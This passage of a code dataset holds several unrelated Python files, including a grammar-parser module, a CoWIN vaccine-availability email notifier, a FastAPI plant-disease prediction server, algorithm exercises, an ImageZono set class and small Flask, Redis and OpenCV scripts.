GlapCompileCmdHelper.make_return_with_value(*args)\n ),\n 'c_stmt(try)': (lambda *args:\n GlapCompileCmdHelper.make_try(*args)\n ),\n 'c_stmt(throw)': (lambda *args:\n GlapCompileCmdHelper.make_throw(*args)\n ),\n 'a_stmt(block)': (lambda *args: mn_(ABlock, *args)),\n 'a_stmt(expr)': (lambda ctx, loc, e: e),\n 'a_stmt(_=_)': (lambda *args: mn_(AAssign, *args)),\n 'a_stmt(_+=_)': (lambda *args: mn_(AInplaceAdd, *args)),\n 'a_stmt(_-=_)': (lambda *args: mn_(AInplaceSub, *args)),\n 'a_stmt(_*=_)': (lambda *args: mn_(AInplaceMul, *args)),\n 'a_stmt(_/=_)': (lambda *args: mn_(AInplaceDiv, *args)),\n 'a_stmt(_%=_)': (lambda *args: mn_(AInplaceMod, *args)),\n 'a_stmt(_&=_)': (lambda *args: mn_(AInplaceBitAnd, *args)),\n 'a_stmt(_|=_)': (lambda *args: mn_(AInplaceBitOr, *args)),\n 'a_stmt(_^=_)': (lambda *args: mn_(AInplaceBitXor, *args)),\n 'a_stmt(_<<=_)': (lambda *args: mn_(AInplaceShiftLeft, *args)),\n 'a_stmt(_>>=_)': (lambda *args: mn_(AInplaceShiftRight, *args)),\n 'a_stmt(if)': (lambda *args: mn_(AIf, *args)),\n 'a_stmt(case)': (lambda *args: mn_(ACase, *args)),\n 'a_stmt(for)': (lambda ctx, loc, v, e, b:\n AFor(\n AId(v.value()).set_location(\n *make_location(ctx, v.position())\n ),\n e, b\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_stmt(while)': (lambda *args: mn_(AWhile, *args)),\n 'a_stmt(do-while)': (lambda *args: mn_(ADoWhile, *args)),\n 'a_stmt(break)': (lambda *args: mn_(ABreak, *args)),\n 'a_stmt(continue)': (lambda *args: mn_(AContinue, *args)),\n 'a_stmt(return)': (lambda *args: mn_(AReturn, *args)),\n 'a_stmt(return(expr))': (lambda *args: mn_(AReturnWithValue, *args)),\n 'a_expr(_||_)': (lambda *args: mn_(ALogOrExpr, *args)),\n 'a_expr(_&&_)': (lambda *args: mn_(ALogAndExpr, *args)),\n 'a_expr(_<_)': (lambda *args: mn_(ALtExpr, *args)),\n 'a_expr(_>_)': (lambda *args: mn_(AGtExpr, *args)),\n 'a_expr(_<=_)': (lambda *args: mn_(ALeExpr, *args)),\n 'a_expr(_>=_)': (lambda 
*args: mn_(AGeExpr, *args)),\n 'a_expr(_==_)': (lambda *args: mn_(AEqExpr, *args)),\n 'a_expr(_!=_)': (lambda *args: mn_(ANotEqExpr, *args)),\n 'a_expr(_|_)': (lambda *args: mn_(ABitOrExpr, *args)),\n 'a_expr(_&_)': (lambda *args: mn_(ABitAndExpr, *args)),\n 'a_expr(_^_)': (lambda *args: mn_(ABitXorExpr, *args)),\n 'a_expr(_<<_)': (lambda *args: mn_(AShiftLeftExpr, *args)),\n 'a_expr(_>>_)': (lambda *args: mn_(AShiftRightExpr, *args)),\n 'a_expr(_+_)': (lambda *args: mn_(AAddExpr, *args)),\n 'a_expr(_-_)': (lambda *args: mn_(ASubExpr, *args)),\n 'a_expr(_*_)': (lambda *args: mn_(AMulExpr, *args)),\n 'a_expr(_/_)': (lambda *args: mn_(ADivExpr, *args)),\n 'a_expr(_%_)': (lambda *args: mn_(AModExpr, *args)),\n 'a_expr(-_)': (lambda *args: mn_(ANegExpr, *args)),\n 'a_expr(~_)': (lambda *args: mn_(AInvExpr, *args)),\n 'a_expr(!_)': (lambda *args: mn_(ANotExpr, *args)),\n 'a_expr(_(_))': (lambda *args: mn_(ACallExpr, *args)),\n 'a_expr(_[_])': (lambda *args: mn_(AIndexExpr, *args)),\n 'a_expr(_.ID)': (lambda ctx, loc, lhs, rhs:\n AAccessExpr(\n lhs,\n AId(rhs.value()).set_location(\n *make_location(ctx, rhs.position())\n )\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_expr_atom(ID)': (lambda *args: mn_(AId, *args)),\n 'a_expr_atom(INT)': (lambda *args: mn_(AIntLiteral, *args)),\n 'a_expr_atom(FLOAT)': (lambda *args: mn_(AFloatLiteral, *args)),\n 'a_expr_atom(STR)': (lambda *args: mn_(AStringLiteral, *args)),\n 'unwrap': self.on_unwrap\n }\n #-def\n\n def on_start(self, context, module):\n \"\"\"\n \"\"\"\n\n return module\n #-def\n\n def on_module(self, context, loc, name, module_units):\n \"\"\"\n \"\"\"\n\n node = DefModule(name.value(), module_units)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_grammar(\n self, context, loc, name, grammar_type_spec, rules_and_commands\n ):\n \"\"\"\n \"\"\"\n\n node = DefGrammar(\n name.value(),\n [\n (x.value(), Location(*make_location(context, x.position())))\n for x in grammar_type_spec\n ],\n rules_and_commands\n )\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule(self, context, lhs, leftarrow, rhs):\n \"\"\"\n \"\"\"\n\n node = DefRule(lhs.value(), rhs, leftarrow.value() == \":\")\n node.set_location(*make_location(context, lhs.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_alt(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs | rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_sub(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = SetMinus(lhs, rhs)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_cat(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs + rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_star(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['*']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_plus(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['+']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_opt(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['?']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_neg(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = -rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_inv(self, context, loc, 
rhs):\n \"\"\"\n \"\"\"\n\n node = ~rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_label(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs % rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_var(self, context, t):\n \"\"\"\n \"\"\"\n\n node = Var(t.value())\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_str(self, context, t):\n \"\"\"\n \"\"\"\n\n v = t.value(True)\n if v == \"\":\n node = Epsilon()\n elif len(v) == 1:\n node = Sym(v)\n else:\n node = Literal(v)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_range(self, context, t, u):\n \"\"\"\n \"\"\"\n\n if len(t.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", t.position()\n )\n if len(u.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", u.position()\n )\n if ord(t.value()) > ord(u.value()):\n raise GlapSyntaxError(context,\n \"Invalid range literal (%r > %r)\" % (t.value(), u.value()),\n t.position()\n )\n a = Sym(t.value())\n a.set_location(*make_location(context, t.position()))\n b = Sym(u.value())\n b.set_location(*make_location(context, u.position()))\n node = Range(a, b)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_epsilon(self, context, loc):\n \"\"\"\n \"\"\"\n\n node = Epsilon()\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_action(self, context, loc, actions):\n \"\"\"\n \"\"\"\n\n l = make_location(context, loc)\n action = ABlock(actions)\n action.set_location(*l)\n node = Action(action)\n node.set_location(*l)\n return node\n #-def\n\n def on_unwrap(self, context, command):\n \"\"\"\n \"\"\"\n\n if self.inmacro:\n raise GlapSyntaxError(context, ie_(\"Unfinished macro definition\"))\n elif self.procedure_nesting_level != 0:\n raise GlapSyntaxError(\n context, ie_(\"Unfinished function definition\")\n )\n kind = command.kind\n if kind < 0:\n raise GlapSyntaxError(context, ie_(\"Unspecified node\"))\n elif kind <= GlapCompileCmdHelper.VARIABLE:\n unwrapped = []\n unwrapped.extend(command.code)\n if kind != GlapCompileCmdHelper.ASSIGN_EXPR:\n unwrapped.append(command.value_expr())\n return unwrapped\n elif kind <= GlapCompileCmdHelper.DEFINE_STATEMENT:\n return [command.value_expr()]\n raise GlapSyntaxError(context,\n ie_(\"Macro nodes was detected outside macro definition scope\")\n )\n #-def\n\n def run(self, action, context, *args):\n \"\"\"\n \"\"\"\n\n if action not in self.actions:\n raise ParsingError(\"Action %r does not exist\" % action)\n return self.actions[action](context, *args)\n #-def\n#-class\n\nclass GlapReader(Reader):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def read(self, source, *args, **opts):\n \"\"\"\n \"\"\"\n\n data, name = self.load_source(source, **opts)\n if data is None:\n return None\n ctx = GlapContext()\n GlapStream(ctx, name, data)\n GlapLexer(ctx)\n GlapParser(ctx)\n GlapActions(ctx)\n #-def\n#-class\n\ndef get_reader_class():\n \"\"\"\n \"\"\"\n\n return GlapReader\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/readers/glap/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":61796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28972148675","text":"import 
config\r\nimport time\r\nimport requests\r\nfrom datetime import date, timedelta\r\nimport smtplib\r\n\r\nuname = config.uname\r\nemail = config.email\r\ndistrict_id = str(config.district_id)\r\nvaccine_type = config.vaccine_type\r\nfee_type =config.fee_type\r\nage_limit = config.age_limit\r\nif age_limit < 45:\r\n age_limit = 18\r\nelse:\r\n age_limit = 45\r\n\r\nisUserNotified = config.isUserNotified\r\ndate_api = []\r\npayload = []\r\navailable_flag_break = config.available_flag_break\r\nattempt = config.attempt\r\nwait_time = config.wait_time\r\n\r\ndef sendmail(payload, email):\r\n def smtp(email, body):\r\n print(\"Sending mail to \" + email)\r\n SMTP_USER_NAME = config.SMTP_USER_NAME\r\n SMTP_PASSWORD = config.SMTP_PASSWORD\r\n SMTP_SERVER = config.SMTP_SERVER\r\n SMTP_PORT = config.SMTP_PORT\r\n TO = email\r\n TEXT = body\r\n SUBJECT = \"Automation Message for the COWIN Vaccine Notifier\"\r\n \r\n smtpserver = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\r\n smtpserver.ehlo()\r\n smtpserver.starttls()\r\n smtpserver.ehlo\r\n smtpserver.login(SMTP_USER_NAME, SMTP_PASSWORD)\r\n header = 'To:' + TO + '\\n' + 'From: ' + SMTP_USER_NAME\r\n header = header + '\\n' + 'Subject:' + SUBJECT + '\\n'\r\n msg = header + '\\n' + TEXT + '\\n\\n'\r\n smtpserver.sendmail(SMTP_USER_NAME, TO, msg)\r\n smtpserver.close()\r\n print(\"Email sent successfully to \" + email)\r\n\r\n def ulify(payload):\r\n string =\"Hi \"\r\n string += uname\r\n string += \"\\n\\nThis is the automation mail send from COWIN Vaccine Notifier\\n\\n\"\r\n string += \"\\n\".join([str(s) for s in payload])\r\n string += \"\\n\\nLink for COWIN Vacination Portal: https://www.cowin.gov.in \\nPS: Since your automation was successfully completed, the script was terminated.\\n\\nThank you for using COWIN Vaccine Notifier.\"\r\n return string\r\n \r\n body = ulify(payload)\r\n smtp(email, body)\r\n\r\nfor ba in range(attempt):\r\n date_api.append( (date.today()+timedelta(days=ba)).strftime(\"%d-%m-%Y\") ) \r\n\r\ndef main():\r\n global isUserNotified\r\n global available_flag_break\r\n\r\n while (isUserNotified == 0):\r\n for b in range(attempt):\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n exit\r\n\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n curl = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=\"+district_id+\"&date=\"+str(date_api[b])\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n x = requests.get(curl, headers = user_agent)\r\n data = x.json()\r\n vax = data['centers']\r\n for i in vax:\r\n for j in i['sessions']:\r\n if j['vaccine'] == vaccine_type and i['fee_type'] == fee_type and j['available_capacity'] > 0 and j['min_age_limit'] == age_limit and j['date'] == date_api[b]:\r\n count = j['available_capacity']\r\n name = i['name']\r\n date = j['date']\r\n p = \"There are \",count,\" \",vaccine_type,\" available in \",name,\" on \",date\r\n pp = ''.join(str(p) for p in p)\r\n print(p)\r\n payload.append(pp)\r\n isUserNotified = 1\r\n available_flag_break = 1\r\n break\r\n sendmail(payload, email) \r\n print(\"going to sleep for {} minutes.\".format(wait_time/60))\r\n time.sleep(wait_time)\r\n","repo_name":"guruhariharaun/CoWIN-Vaccine-Notifier","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"960713365","text":"from typing import Union\nimport uvicorn\nfrom fastapi import FastAPI, File, UploadFile\nfrom 
fastapi.middleware.cors import CORSMiddleware\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image\nimport tensorflow as tf\nimport requests\nfrom flask_cors import CORS\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# specify the correct endpoint\nendpoint = \"http://localhost:8504/v1/models/saved_model:predict\"\nCLASS_NAME = [\"early blight\", \"late blight\", \"healthy\"]\n\n@app.get(\"/ping\" )\nasync def ping():\n return \"pinging..\"\n\n\ndef readFileAsImage(data) ->np.ndarray:\n #convert the uploaded file to numpy array\n image = np.array(Image.open(BytesIO(data)))\n return image\n\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile = File(...)):\n image = readFileAsImage(await file.read())#await helps the system to handle multiple requests\n img_batch = np.expand_dims(image, 0)#remember the model takes a batch image as input but here we are provinding only one image. so we expand dimensions \n json_data = {\n \"instances\": img_batch.tolist()\n }\n response = requests.post(endpoint,json=json_data)\n prediction = np.array(response.json()[\"predictions\"][0])\n \n predicted_class = CLASS_NAME[np.argmax(prediction)]\n confidence = np.max(prediction)\n\n return {\n \"class\": predicted_class,\n \"confidence\": float(confidence)\n }\n\ndef application(environ, start_response):\n if environ['REQUEST_METHOD'] == 'OPTIONS':\n start_response(\n '200 OK',\n [\n ('Content-Type', 'application/json'),\n ('Access-Control-Allow-Origin', '*'),\n ('Access-Control-Allow-Headers', 'Authorization, Content-Type'),\n ('Access-Control-Allow-Methods', 'POST'),\n ]\n )\n return ''\n\nif __name__ == \"__main__\":\n uvicorn.run(app,host='localhost',port=8060)","repo_name":"NelsonMbogori/fastApi-MAchineLearning","sub_path":"maintfserving.py","file_name":"maintfserving.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36404104877","text":"# https://www.acmicpc.net/problem/18352\nimport sys\nfrom collections import deque\n\nn, m, k, x = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n + 1)]\ndistance = [-1] * (n + 1)\ndistance[x] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().split())\n graph[a].append(b)\n\nqueue = deque([x])\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if distance[i] == -1:\n queue.append(i)\n distance[i] = distance[v] + 1\n\ncheck = False\nfor i in range(1, n + 1):\n if distance[i] == k:\n print(i)\n check = True\n\nif check == False:\n print(-1)","repo_name":"graygreat/algorithm-study","sub_path":"BaekJoon/Searching/특정_거리의_도시_찾기_18352.py","file_name":"특정_거리의_도시_찾기_18352.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23046737677","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass ImageZono:\n # ImageZono class\n # Class for representing set of images using Zonotope\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageZono Set \n # author: Sung Woo Choi\n # date: 9/30/2021\n\n # 2-Dimensional ImageZono\n # ====================================================================%\n # Definition of 2-Dimensonal ImageZono\n # \n # A ImageZono Z= is defined by: \n # S = {x| x = c + a[1]*V[1] + a[2]*V[2] + ... 
+ a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where -1 <= a[i] <= 1}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # The notion of 2D ImageZono is more general than the original Zonotope where\n # the V[0] and V[i] are vectors. \n # \n # Dimension of 2D ImageZono is the dimension of the center matrix V[0]\n # \n # ====================================================================%\n # The 2D representation of ImageZono is convenient for reachability analysis\n\n def __init__(obj, V = np.array([]), # an array of basis images \n lb_image = np.array([]), # lower bound of attack (high-dimensional array)\n ub_image = np.array([])): # upper bound of attack (high-dimensional array)\n from engine.set.star import Star\n from engine.set.zono import Zono\n\n if V.size:\n assert isinstance(V, np.ndarray), 'error: an array of basis images is not an ndarray'\n\n obj.V = V\n [obj.numChannels, obj.height, obj.width] = obj.V[0].shape\n obj.numPreds = obj.V.shape[0] - 1\n\n center = obj.V[1,:,:,:]\n generators = obj.V[1:obj.numPreds + 1, :,:,:]\n center = center.reshape(-1,1)\n generators = generators.reshape(-1, obj.numPreds)\n\n Z = Zono(center, generators)\n [lb, ub] = Z.getBounds()\n\n # A box representation of an ImageZono\n # A convenient way for user to specify the attack\n obj.lb_image = np.array(lb).reshape((obj.numChannels, obj.height, obj.width))\n obj.ub_image = np.array(ub).reshape((obj.numChannels, obj.height, obj.width))\n return\n\n\n if lb_image.size and ub_image.size:\n assert isinstance(lb_image, np.ndarray), 'error: a lower bound of attack is not an ndarray'\n assert isinstance(ub_image, np.ndarray), 'error: a upper bound of attack is not an ndarray'\n\n if lb_image.shape != ub_image.shape:\n raise Exception('error: different sizes between lower bound image and upper bound image')\n\n obj.lb_image = lb_image\n obj.ub_image = ub_image\n\n if len(lb_image.shape) == 3:\n obj.numChannels = obj.lb_image.shape[0] # number of channels, e.g., color images have 3 channel\n obj.height = obj.lb_image.shape[1] # height of image\n obj.width = obj.lb_image.shape[2] # width of image\n elif len(lb_image.shape) == 2:\n obj.numChannels = 1\n obj.height = obj.lb_image.shape[0]\n obj.width = obj.lb_image.shape[1]\n else:\n raise Exception('image bounds need to be a tuple of three elements: numChannels, image width, image height')\n lb = obj.lb_image.reshape(-1,1)\n ub = obj.ub_image.reshape(-1,1)\n\n S = Star(lb=lb, ub=ub)\n obj.numPreds = S.nVar # number of predicate variables\n obj.V = np.reshape(S.V, (obj.numPreds + 1, obj.numChannels, obj.height, obj.width))\n return\n \n raise Exception('error: failed to create ImageZono')\n\n#------------------check if this function is working--------------------------------------------\n # evaluate an ImageZono with specific values of predicates\n def evaluate(obj, pred_val = np.matrix([])):\n # @pred_val: valued vector of predicate variables\n\n assert obj.V.size, 'error: the ImageZono is an empty set'\n assert pred_val.size[1] == 1, 'error: invalid predicate vector'\n assert pred_val.size[0] == obj.numPreds, 'error: inconsistency between the size of the predicate vector and the number of preeicates in the ImageZono'\n\n # check if all values of predicate variables are in [-1, 1]\n for i in range(obj.numPreds):\n if not (pred_val[i]<=1 and 
pred_val[i]>=-1):\n raise Exception('error: predicate values should be in the range of [-1, 1] for ImageZono')\n\n image = np.zeros((obj.numChannels, obj.height, obj.width))\n for i in range(obj.numChannels):\n image[i, :, :] = obj.V[1, i, :, :]\n for j in range(1, obj.numPreds + 1):\n image[i, :, :] = image[i, :, :] + pred_val[j-1] * obj.V[j, i, :, :]\n return image\n\n # affineMap of an ImageZono is another ImageZono\n # y = scale * x + offset\n def affineMap(obj, scale, offset):\n # @scale: scale coefficient [1 x 1 x NumChannels] array\n # @offset: offset coefficient [1 x 1 x NumChannels] array\n # return: a new ImageZono\n\n assert scale.size and not np.isscalar(scale) and scale.shape[0] == obj.numChannels, 'error: inconsistent number of channels between scale array and the ImageZono'\n \n if scale.size:\n new_V = scale * obj.V\n else:\n new_V = obj.V\n\n if offset.size:\n new_V[1, :, :, :] = new_V[1, :, :, :] + offset\n \n return ImageZono(new_V)\n\n # transform to Zono\n def toZono(obj):\n from engine.set.zono import Zono\n\n center = obj.V[1,:,:,:,]\n generators = obj.V[1:obj.numPreds + 1,:,:,:]\n\n center = center.reshape(-1, 1)\n generators = np.reshape(generators, (obj.height*obj.width*obj.numChannels, obj.numPreds))\n return Zono(center, generators)\n\n#------------------check if this function is working--------------------------------------------\n # transform to ImageStar\n def toImageStar(obj):\n from imagestar import ImageStar\n pred_lb = -np.ones((obj.numPreds, 1))\n pred_ub = np.ones((obj.numPreds, 1))\n\n C = np.hstack((np.eye(obj.numPreds), -np.eye(obj.numPreds))) \n d = np.hstack((pred_ub, -pred_lb))\n return ImageStar(obj.V, C, d, pred_lb, pred_ub, obj.lb_image, obj.ub_image)\n \n\n#------------------check if this function is working--------------------------------------------\n # contain, check if an ImageZono contain an image\n def contains(obj, image):\n # @image: input image\n # @bool = 1 if the ImageStar contain the image\n # 2 if the ImageStar does not contain the image\n\n n = image.shape\n if len(n) == 2: # one channel image\n assert obj.numChannels == 1 and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n elif len(n) == 3:\n assert n[0] == obj.numChannels and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n else:\n raise Exception('error: invalid input image')\n\n Z = obj.toZono()\n return Z.contains(y)\n\n # get Ranges\n def getRanges(obj):\n return [obj.lb_image, obj.ub_image]\n\n#------------------check if this function is working--------------------------------------------\n def is_p1_larger_p2(obj, p1, p2):\n # @p1: the first point = []\n # @p2: the second point = []\n # h: height, w: width, c: channel index\n\n # @b = 1 -> p1 > p2 is feasible\n # = 0 -> p1 > p2 is infeasible\n\n S = obj.toImageStar\n return S.is_p1_larger_p2(p1, p2)\n \n def __str__(obj):\n print('class: %s' % (obj.__class__))\n print('height: %s \\nwidth: %s' % (obj.height, obj.width))\n print('lb_image: [%sx%sx%s %s]' % (obj.lb_image.shape[0], obj.lb_image.shape[1], obj.lb_image.shape[2], obj.lb_image.dtype))\n print('ub_image: [%sx%sx%s %s]' % (obj.ub_image.shape[0], obj.ub_image.shape[1], obj.ub_image.shape[2], obj.ub_image.dtype))\n if len(obj.V.shape) == 4:\n print('V: [%sx%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.shape[3], obj.V.dtype))\n else:\n print('V: [%sx%sx%s %s]' % 
(obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.dtype))\n return 'numPreds: %s\\n' % (obj.numPreds)\n \n def __repr__(obj):\n return \"class: %s \\nnumChannels: %s\\nheight: %s\\nwidth: %s\\nlb_image:\\n%s\\nub_image: \\n%s\\nV: \\n%s\\nnumPred: %s\" % (obj.__class__, obj.numChannels, obj.height, obj.width, obj.lb_image, obj.ub_image, obj.V, obj.numPreds)\n\n\n\n\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagezono/imagezono.py","file_name":"imagezono.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18950976005","text":"##\n## EPITECH PROJECT, 2021\n## 109titration\n## File description:\n## main\n##\n\nimport sys\nfrom utils import *\nfrom calc import *\n\ndef titration(data):\n\tderive = calc_deriv(data)\n\tcalc_deriv_bis(derive, data)\n\tcalc_deriv_bis_estimation(derive, data)\n\ndef main():\n\tcheck_arguments()\n\tdata = load_csv_file()\n\ttitration(data)","repo_name":"Xantass/Project-Epitech","sub_path":"Semester_2/109titration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7686272889","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom admin_tools.menu import items\nfrom jmb.core.admin.menu import register_menu\n\ncurrency_menu_item = items.MenuItem(\n _('project'),\n reverse('admin:app_list', kwargs={'app_label': 'project'}),\n children=[\n items.MenuItem(_('add project'), reverse('admin:project_project_add', )),\n items.MenuItem(_('list project'), reverse('admin:project_project_changelist', )),\n items.MenuItem(_('add task'), reverse('admin:project_task_add', )),\n items.MenuItem(_('list task'), reverse('admin:project_task_changelist', )),\n ]\n)\n\nregister_menu(currency_menu_item, 'project')\n","repo_name":"monkeybits/edilcloud-back","sub_path":"apps/project/jmenu.py","file_name":"jmenu.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29052582314","text":"# 숫자가 쓰인 카드들이 N x M 형태로 놓여 있다. 
N은 행의 개수, M은 열의 개수\n# 먼저 뽑고자 하는 카드의 행 선택\n# 그 다음 선택된 행에 포함된 카드 중 가장 낮은 카드 뽑음\n# 처음 카드를 골라낼 행을 선택할 때, 이후에 해당 행에서 가장 숫자가 낮은 카드를 뽑을 것을 고려하여 최종적으로 가장 높은 숫자의 카드를 뽑을 수 있도록 전략 세움\n# 카드에 적힌 숫자는 1 이상 10,000 이하의 자연수\n# 행의 개수 N과 열의 개수 M이 공백을 기준으로 하여 각각 자연수로 주어짐(1 <= N, M <= 100)\n\nn, m = list(map(int, input().split()))\n\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n","repo_name":"ImWonYong/TIL","sub_path":"Algorithm/Greedy/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"35782801024","text":"from flask import Flask, render_template, request\r\nfrom openpyxl import load_workbook, Workbook\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n# Function to create or load the Excel file\r\ndef get_workbook():\r\n try:\r\n workbook = load_workbook(\"user_data.xlsx\")\r\n except FileNotFoundError:\r\n workbook = Workbook()\r\n sheet = workbook.active\r\n sheet.append([\"Name\", \"Email\", \"Employ Code\", \"Optical Message\", \"Date and Time\"])\r\n return workbook\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form.get('name')\r\n email = request.form.get('email')\r\n emp_code = request.form.get('empCode')\r\n optical_message = request.form.get('opticalMessage')\r\n \r\n # Add the current date and time\r\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n workbook = get_workbook()\r\n sheet = workbook.active\r\n\r\n # Add the submitted data along with the timestamp to the Excel file\r\n sheet.append([name, email, emp_code, optical_message, timestamp])\r\n\r\n # Save the Excel file\r\n excel_file_name = \"user_data.xlsx\"\r\n workbook.save(excel_file_name)\r\n\r\n return render_template('index.html', message=\"Data saved successfully!\")\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"ImShehan/UserDataApplication","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34613178159","text":"from redis import Redis\n\nclient = Redis()\nprint(client.ping())\nif client.ping():\n print(1111111111)\n\n\na = [2,3,4, 123,333, 1]\nb = (1,2,3,4,5)\nprint(zip(a, b))\na = list(zip(a, b))\nprint(a)\n\na = '2020-01-01 02:02:00'\nimport datetime\na = datetime.datetime.strptime(a, '%Y-%m-%d %X')\nprint(a)\nb = a + datetime.timedelta(hours=8)\nprint(b)\n\n\n","repo_name":"281234086/data_struct","sub_path":"redis_study/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28863125662","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\n\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH);\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT); \nout = cv2.VideoWriter('output.avi', fourcc, 15.0, (int(w),int(h)))\n\n\nwhile True:\n\tret, frame = cap.read()\n\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tout.write(frame)\n\n\tcv2.imshow('frame',frame)\n\tcv2.imshow('gray',gray)\n\n\tif cv2.waitKey(1) & 0xFF == 
